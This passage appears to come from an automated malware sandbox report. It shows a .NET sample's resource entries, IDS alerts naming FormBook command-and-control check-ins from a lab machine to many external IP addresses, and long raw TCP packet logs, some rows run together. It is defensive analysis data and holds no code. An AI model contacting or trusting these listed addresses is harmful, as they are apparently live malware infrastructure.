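|---|---|---|---|---|---|---|
| RT_ICON | 0xbc0c8 | 0x12cf | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | | | 0.9123572170301142 |
| RT_GROUP_ICON | 0xbd3a8 | 0x14 | data | | | 1.05 |
| RT_VERSION | 0xbd3cc | 0x350 | data | | | 0.4009433962264151 |
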
| DLL | Import |
|---|---|
| mscoree.dll | _CorExeMain |

| Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol |
|---|---|---|---|---|---|---|---|---|
| 2024-10-30T08:10:32.954880+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 49741 | 3.33.130.190 | 80 | TCP |
| 2024-10-30T08:10:32.954880+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 49741 | 3.33.130.190 | 80 | TCP |
| 2024-10-30T08:10:50.202498+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49794 | 103.120.80.111 | 80 | TCP |
| 2024-10-30T08:10:52.752803+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49810 | 103.120.80.111 | 80 | TCP |
| 2024-10-30T08:10:55.113557+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49826 | 103.120.80.111 | 80 | TCP |
| 2024-10-30T08:10:57.668868+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 49840 | 103.120.80.111 | 80 | TCP |
| 2024-10-30T08:10:57.668868+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 49840 | 103.120.80.111 | 80 | TCP |
| 2024-10-30T08:11:03.748001+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49876 | 217.160.0.60 | 80 | TCP |
| 2024-10-30T08:11:06.297814+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49890 | 217.160.0.60 | 80 | TCP |
| 2024-10-30T08:11:08.869961+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49904 | 217.160.0.60 | 80 | TCP |
| 2024-10-30T08:11:11.413201+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 49918 | 217.160.0.60 | 80 | TCP |
| 2024-10-30T08:11:11.413201+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 49918 | 217.160.0.60 | 80 | TCP |
| 2024-10-30T08:11:17.480354+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49954 | 161.97.142.144 | 80 | TCP |
| 2024-10-30T08:11:20.001402+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49969 | 161.97.142.144 | 80 | TCP |
| 2024-10-30T08:11:22.550127+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49985 | 161.97.142.144 | 80 | TCP |
| 2024-10-30T08:11:25.122859+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 50000 | 161.97.142.144 | 80 | TCP |
| 2024-10-30T08:11:25.122859+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 50000 | 161.97.142.144 | 80 | TCP |
| 2024-10-30T08:11:30.980430+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50020 | 13.248.169.48 | 80 | TCP |
| 2024-10-30T08:11:33.545456+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50021 | 13.248.169.48 | 80 | TCP |
| 2024-10-30T08:11:36.187303+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50022 | 13.248.169.48 | 80 | TCP |
| 2024-10-30T08:11:38.753227+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 50023 | 13.248.169.48 | 80 | TCP |
| 2024-10-30T08:11:38.753227+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 50023 | 13.248.169.48 | 80 | TCP |
| 2024-10-30T08:11:44.898287+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50024 | 198.251.84.200 | 80 | TCP |
| 2024-10-30T08:11:47.490413+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50025 | 198.251.84.200 | 80 | TCP |
| 2024-10-30T08:11:49.932895+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50026 | 198.251.84.200 | 80 | TCP |
| 2024-10-30T08:11:52.581487+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 50027 | 198.251.84.200 | 80 | TCP |
| 2024-10-30T08:11:52.581487+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 50027 | 198.251.84.200 | 80 | TCP |
| 2024-10-30T08:11:58.333652+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50028 | 172.67.154.67 | 80 | TCP |
| 2024-10-30T08:12:00.880361+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50029 | 172.67.154.67 | 80 | TCP |
| 2024-10-30T08:12:03.455281+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50030 | 172.67.154.67 | 80 | TCP |
| 2024-10-30T08:12:06.047015+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 50031 | 172.67.154.67 | 80 | TCP |
| 2024-10-30T08:12:06.047015+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 50031 | 172.67.154.67 | 80 | TCP |
| 2024-10-30T08:12:15.299563+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50032 | 20.2.249.7 | 80 | TCP |
| 2024-10-30T08:12:17.871433+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50033 | 20.2.249.7 | 80 | TCP |
| 2024-10-30T08:12:20.486991+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50034 | 20.2.249.7 | 80 | TCP |
| 2024-10-30T08:12:22.879079+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 50035 | 20.2.249.7 | 80 | TCP |
| 2024-10-30T08:12:22.879079+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 50035 | 20.2.249.7 | 80 | TCP |
| 2024-10-30T08:12:30.309501+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50036 | 203.161.49.193 | 80 | TCP |
| 2024-10-30T08:12:32.868097+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50037 | 203.161.49.193 | 80 | TCP |
| 2024-10-30T08:12:35.417291+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50038 | 203.161.49.193 | 80 | TCP |
| 2024-10-30T08:12:37.957230+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 50039 | 203.161.49.193 | 80 | TCP |
| 2024-10-30T08:12:37.957230+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 50039 | 203.161.49.193 | 80 | TCP |
| 2024-10-30T08:12:43.809745+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50040 | 199.59.243.227 | 80 | TCP |
| 2024-10-30T08:12:46.357760+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50041 | 199.59.243.227 | 80 | TCP |
| 2024-10-30T08:12:48.895001+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50042 | 199.59.243.227 | 80 | TCP |
| 2024-10-30T08:12:51.443226+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 50043 | 199.59.243.227 | 80 | TCP |
| 2024-10-30T08:12:51.443226+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 50043 | 199.59.243.227 | 80 | TCP |
| 2024-10-30T08:12:57.609084+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50044 | 217.76.156.252 | 80 | TCP |
| 2024-10-30T08:13:00.169619+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50045 | 217.76.156.252 | 80 | TCP |
| 2024-10-30T08:13:02.751785+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50046 | 217.76.156.252 | 80 | TCP |
| 2024-10-30T08:13:05.362313+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 50047 | 217.76.156.252 | 80 | TCP |
| 2024-10-30T08:13:05.362313+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 50047 | 217.76.156.252 | 80 | TCP |
| 2024-10-30T08:13:11.643333+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50048 | 144.76.190.39 | 80 | TCP |
| 2024-10-30T08:13:14.252584+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50049 | 144.76.190.39 | 80 | TCP |
| 2024-10-30T08:13:16.688104+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50050 | 144.76.190.39 | 80 | TCP |
| 2024-10-30T08:13:19.252594+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 50051 | 144.76.190.39 | 80 | TCP |
| 2024-10-30T08:13:19.252594+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 50051 | 144.76.190.39 | 80 | TCP |
| 2024-10-30T08:13:25.393989+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50052 | 34.92.128.59 | 80 | TCP |
| 2024-10-30T08:13:28.199291+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50053 | 34.92.128.59 | 80 | TCP |
| 2024-10-30T08:13:30.545952+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50054 | 34.92.128.59 | 80 | TCP |
| 2024-10-30T08:13:33.174085+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 50055 | 34.92.128.59 | 80 | TCP |
                                                                                                                                                                              2024-10-30T08:13:33.174085+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.45005534.92.128.5980TCP
                                                                                                                                                                              2024-10-30T08:13:39.287979+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450056152.42.255.4880TCP
                                                                                                                                                                              2024-10-30T08:13:41.851526+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450057152.42.255.4880TCP
                                                                                                                                                                              2024-10-30T08:13:44.467456+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450058152.42.255.4880TCP
                                                                                                                                                                              2024-10-30T08:13:46.940067+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.450059152.42.255.4880TCP
                                                                                                                                                                              2024-10-30T08:13:46.940067+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.450059152.42.255.4880TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                                                                              Oct 30, 2024 08:11:17.480247021 CET8049954161.97.142.144192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:11:17.480354071 CET4995480192.168.2.4161.97.142.144
                                                                                                                                                                              Oct 30, 2024 08:11:17.623301029 CET8049954161.97.142.144192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:11:17.623362064 CET4995480192.168.2.4161.97.142.144
                                                                                                                                                                              Oct 30, 2024 08:11:18.144011974 CET4995480192.168.2.4161.97.142.144
                                                                                                                                                                              Oct 30, 2024 08:11:19.162092924 CET4996980192.168.2.4161.97.142.144
                                                                                                                                                                              Oct 30, 2024 08:11:19.167602062 CET8049969161.97.142.144192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:11:19.167731047 CET4996980192.168.2.4161.97.142.144
                                                                                                                                                                              Oct 30, 2024 08:11:19.179251909 CET4996980192.168.2.4161.97.142.144
                                                                                                                                                                              Oct 30, 2024 08:11:19.184751034 CET8049969161.97.142.144192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:11:20.001339912 CET8049969161.97.142.144192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:11:20.001355886 CET8049969161.97.142.144192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:11:20.001401901 CET4996980192.168.2.4161.97.142.144
                                                                                                                                                                              Oct 30, 2024 08:11:20.122385025 CET8049969161.97.142.144192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:11:20.122467995 CET4996980192.168.2.4161.97.142.144
                                                                                                                                                                              Oct 30, 2024 08:11:20.690222979 CET4996980192.168.2.4161.97.142.144
                                                                                                                                                                              Oct 30, 2024 08:11:21.708995104 CET4998580192.168.2.4161.97.142.144
                                                                                                                                                                              Oct 30, 2024 08:11:21.714390993 CET8049985161.97.142.144192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:11:21.714509010 CET4998580192.168.2.4161.97.142.144
                                                                                                                                                                              Oct 30, 2024 08:11:21.725886106 CET4998580192.168.2.4161.97.142.144
                                                                                                                                                                              Oct 30, 2024 08:11:21.731362104 CET8049985161.97.142.144192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:11:21.731375933 CET8049985161.97.142.144192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:11:21.731386900 CET8049985161.97.142.144192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:11:21.731395960 CET8049985161.97.142.144192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:11:21.731432915 CET8049985161.97.142.144192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:11:21.731442928 CET8049985161.97.142.144192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:11:21.731596947 CET8049985161.97.142.144192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:11:21.731607914 CET8049985161.97.142.144192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:11:21.731617928 CET8049985161.97.142.144192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:11:22.550036907 CET8049985161.97.142.144192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:11:22.550060034 CET8049985161.97.142.144192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:11:22.550127029 CET4998580192.168.2.4161.97.142.144
                                                                                                                                                                              Oct 30, 2024 08:11:22.671957970 CET8049985161.97.142.144192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:11:22.672038078 CET4998580192.168.2.4161.97.142.144
                                                                                                                                                                              Oct 30, 2024 08:11:23.237129927 CET4998580192.168.2.4161.97.142.144
                                                                                                                                                                              Oct 30, 2024 08:11:24.287388086 CET5000080192.168.2.4161.97.142.144
                                                                                                                                                                              Oct 30, 2024 08:11:24.292695045 CET8050000161.97.142.144192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:11:24.292819977 CET5000080192.168.2.4161.97.142.144
                                                                                                                                                                              Oct 30, 2024 08:11:24.304682970 CET5000080192.168.2.4161.97.142.144
                                                                                                                                                                              Oct 30, 2024 08:11:24.310013056 CET8050000161.97.142.144192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:11:25.122616053 CET8050000161.97.142.144192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:11:25.122648954 CET8050000161.97.142.144192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:11:25.122663021 CET8050000161.97.142.144192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:11:25.122698069 CET8050000161.97.142.144192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:11:25.122859001 CET5000080192.168.2.4161.97.142.144
                                                                                                                                                                              Oct 30, 2024 08:11:25.244554996 CET8050000161.97.142.144192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:11:25.244746923 CET5000080192.168.2.4161.97.142.144
                                                                                                                                                                              Oct 30, 2024 08:11:25.245599985 CET5000080192.168.2.4161.97.142.144
                                                                                                                                                                              Oct 30, 2024 08:11:25.250905037 CET8050000161.97.142.144192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:11:30.283425093 CET5002080192.168.2.413.248.169.48
                                                                                                                                                                              Oct 30, 2024 08:11:30.288718939 CET805002013.248.169.48192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:11:30.288794041 CET5002080192.168.2.413.248.169.48
                                                                                                                                                                              Oct 30, 2024 08:11:30.302237034 CET5002080192.168.2.413.248.169.48
                                                                                                                                                                              Oct 30, 2024 08:11:30.307531118 CET805002013.248.169.48192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:11:30.980334044 CET805002013.248.169.48192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:11:30.980429888 CET5002080192.168.2.413.248.169.48
                                                                                                                                                                              Oct 30, 2024 08:11:31.815344095 CET5002080192.168.2.413.248.169.48
                                                                                                                                                                              Oct 30, 2024 08:11:31.820709944 CET805002013.248.169.48192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:11:32.836324930 CET5002180192.168.2.413.248.169.48
                                                                                                                                                                              Oct 30, 2024 08:11:32.841784954 CET805002113.248.169.48192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:11:32.841861963 CET5002180192.168.2.413.248.169.48
                                                                                                                                                                              Oct 30, 2024 08:11:32.933159113 CET5002180192.168.2.413.248.169.48
                                                                                                                                                                              Oct 30, 2024 08:11:32.938570976 CET805002113.248.169.48192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:11:33.545315981 CET805002113.248.169.48192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:11:33.545455933 CET5002180192.168.2.413.248.169.48
                                                                                                                                                                              Oct 30, 2024 08:11:34.440257072 CET5002180192.168.2.413.248.169.48
                                                                                                                                                                              Oct 30, 2024 08:11:34.445739031 CET805002113.248.169.48192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:11:35.459747076 CET5002280192.168.2.413.248.169.48
                                                                                                                                                                              Oct 30, 2024 08:11:35.516447067 CET805002213.248.169.48192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:11:35.516539097 CET5002280192.168.2.413.248.169.48
                                                                                                                                                                              Oct 30, 2024 08:11:35.528155088 CET5002280192.168.2.413.248.169.48
                                                                                                                                                                              Oct 30, 2024 08:11:35.533658981 CET805002213.248.169.48192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:11:35.533670902 CET805002213.248.169.48192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:11:35.533710003 CET805002213.248.169.48192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:11:35.533720970 CET805002213.248.169.48192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:11:35.533744097 CET805002213.248.169.48192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:11:35.533755064 CET805002213.248.169.48192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:11:35.533767939 CET805002213.248.169.48192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:11:35.533797979 CET805002213.248.169.48192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:11:35.533808947 CET805002213.248.169.48192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:11:36.187227011 CET805002213.248.169.48192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:11:36.187303066 CET5002280192.168.2.413.248.169.48
                                                                                                                                                                              Oct 30, 2024 08:11:37.033948898 CET5002280192.168.2.413.248.169.48
                                                                                                                                                                              Oct 30, 2024 08:11:37.039356947 CET805002213.248.169.48192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:11:38.053756952 CET5002380192.168.2.413.248.169.48
                                                                                                                                                                              Oct 30, 2024 08:11:38.059263945 CET805002313.248.169.48192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:11:38.059369087 CET5002380192.168.2.413.248.169.48
                                                                                                                                                                              Oct 30, 2024 08:11:38.066788912 CET5002380192.168.2.413.248.169.48
                                                                                                                                                                              Oct 30, 2024 08:11:38.072212934 CET805002313.248.169.48192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:11:38.719858885 CET805002313.248.169.48192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:11:38.753062010 CET805002313.248.169.48192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:11:38.753226995 CET5002380192.168.2.413.248.169.48
                                                                                                                                                                              Oct 30, 2024 08:11:38.815401077 CET5002380192.168.2.413.248.169.48
                                                                                                                                                                              Oct 30, 2024 08:11:38.821244955 CET805002313.248.169.48192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:11:43.864777088 CET5002480192.168.2.4198.251.84.200
                                                                                                                                                                              Oct 30, 2024 08:11:43.870285034 CET8050024198.251.84.200192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:11:43.870352030 CET5002480192.168.2.4198.251.84.200
                                                                                                                                                                              Oct 30, 2024 08:11:43.883404016 CET5002480192.168.2.4198.251.84.200
                                                                                                                                                                              Oct 30, 2024 08:11:43.888942003 CET8050024198.251.84.200192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:11:44.784115076 CET8050024198.251.84.200192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:11:44.898287058 CET5002480192.168.2.4198.251.84.200
                                                                                                                                                                              Oct 30, 2024 08:11:44.945344925 CET8050024198.251.84.200192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:11:44.950680017 CET5002480192.168.2.4198.251.84.200
                                                                                                                                                                              Oct 30, 2024 08:11:45.394967079 CET5002480192.168.2.4198.251.84.200
                                                                                                                                                                              Oct 30, 2024 08:11:46.412173986 CET5002580192.168.2.4198.251.84.200
                                                                                                                                                                              Oct 30, 2024 08:11:46.419262886 CET8050025198.251.84.200192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:11:46.419435978 CET5002580192.168.2.4198.251.84.200
                                                                                                                                                                              Oct 30, 2024 08:11:46.430624962 CET5002580192.168.2.4198.251.84.200
                                                                                                                                                                              Oct 30, 2024 08:11:46.435978889 CET8050025198.251.84.200192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:11:47.336349010 CET8050025198.251.84.200192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:11:47.490412951 CET5002580192.168.2.4198.251.84.200
                                                                                                                                                                              Oct 30, 2024 08:11:47.492708921 CET8050025198.251.84.200192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:11:47.492764950 CET5002580192.168.2.4198.251.84.200
                                                                                                                                                                              Oct 30, 2024 08:11:47.940228939 CET5002580192.168.2.4198.251.84.200
                                                                                                                                                                              Oct 30, 2024 08:11:48.958935976 CET5002680192.168.2.4198.251.84.200
                                                                                                                                                                              Oct 30, 2024 08:12:34.705764055 CET8050038203.161.49.193192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:12:34.705790997 CET8050038203.161.49.193192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:12:34.705840111 CET8050038203.161.49.193192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:12:34.705884933 CET8050038203.161.49.193192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:12:35.379117012 CET8050038203.161.49.193192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:12:35.417001963 CET8050038203.161.49.193192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:12:35.417290926 CET5003880192.168.2.4203.161.49.193
                                                                                                                                                                              Oct 30, 2024 08:12:36.205892086 CET5003880192.168.2.4203.161.49.193
                                                                                                                                                                              Oct 30, 2024 08:12:37.228687048 CET5003980192.168.2.4203.161.49.193
                                                                                                                                                                              Oct 30, 2024 08:12:37.234185934 CET8050039203.161.49.193192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:12:37.234272003 CET5003980192.168.2.4203.161.49.193
                                                                                                                                                                              Oct 30, 2024 08:12:37.241488934 CET5003980192.168.2.4203.161.49.193
                                                                                                                                                                              Oct 30, 2024 08:12:37.246881962 CET8050039203.161.49.193192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:12:37.918967009 CET8050039203.161.49.193192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:12:37.957118034 CET8050039203.161.49.193192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:12:37.957230091 CET5003980192.168.2.4203.161.49.193
                                                                                                                                                                              Oct 30, 2024 08:12:37.958144903 CET5003980192.168.2.4203.161.49.193
                                                                                                                                                                              Oct 30, 2024 08:12:37.963479042 CET8050039203.161.49.193192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:12:43.165565014 CET5004080192.168.2.4199.59.243.227
                                                                                                                                                                              Oct 30, 2024 08:12:43.171041965 CET8050040199.59.243.227192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:12:43.171119928 CET5004080192.168.2.4199.59.243.227
                                                                                                                                                                              Oct 30, 2024 08:12:43.183733940 CET5004080192.168.2.4199.59.243.227
                                                                                                                                                                              Oct 30, 2024 08:12:43.189282894 CET8050040199.59.243.227192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:12:43.809514999 CET8050040199.59.243.227192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:12:43.809561968 CET8050040199.59.243.227192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:12:43.809672117 CET8050040199.59.243.227192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:12:43.809745073 CET5004080192.168.2.4199.59.243.227
                                                                                                                                                                              Oct 30, 2024 08:12:44.690149069 CET5004080192.168.2.4199.59.243.227
                                                                                                                                                                              Oct 30, 2024 08:12:45.712038040 CET5004180192.168.2.4199.59.243.227
                                                                                                                                                                              Oct 30, 2024 08:12:45.717413902 CET8050041199.59.243.227192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:12:45.719291925 CET5004180192.168.2.4199.59.243.227
                                                                                                                                                                              Oct 30, 2024 08:12:45.732055902 CET5004180192.168.2.4199.59.243.227
                                                                                                                                                                              Oct 30, 2024 08:12:45.737510920 CET8050041199.59.243.227192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:12:46.357311010 CET8050041199.59.243.227192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:12:46.357333899 CET8050041199.59.243.227192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:12:46.357759953 CET5004180192.168.2.4199.59.243.227
                                                                                                                                                                              Oct 30, 2024 08:12:46.357800007 CET8050041199.59.243.227192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:12:46.357954979 CET5004180192.168.2.4199.59.243.227
                                                                                                                                                                              Oct 30, 2024 08:12:47.239557981 CET5004180192.168.2.4199.59.243.227
                                                                                                                                                                              Oct 30, 2024 08:12:48.259870052 CET5004280192.168.2.4199.59.243.227
                                                                                                                                                                              Oct 30, 2024 08:12:48.265345097 CET8050042199.59.243.227192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:12:48.265873909 CET5004280192.168.2.4199.59.243.227
                                                                                                                                                                              Oct 30, 2024 08:12:48.280092001 CET5004280192.168.2.4199.59.243.227
                                                                                                                                                                              Oct 30, 2024 08:12:48.285561085 CET8050042199.59.243.227192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:12:48.285587072 CET8050042199.59.243.227192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:12:48.285599947 CET8050042199.59.243.227192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:12:48.285640955 CET8050042199.59.243.227192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:12:48.285650969 CET8050042199.59.243.227192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:12:48.285770893 CET8050042199.59.243.227192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:12:48.285801888 CET8050042199.59.243.227192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:12:48.285840988 CET8050042199.59.243.227192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:12:48.285895109 CET8050042199.59.243.227192.168.2.4
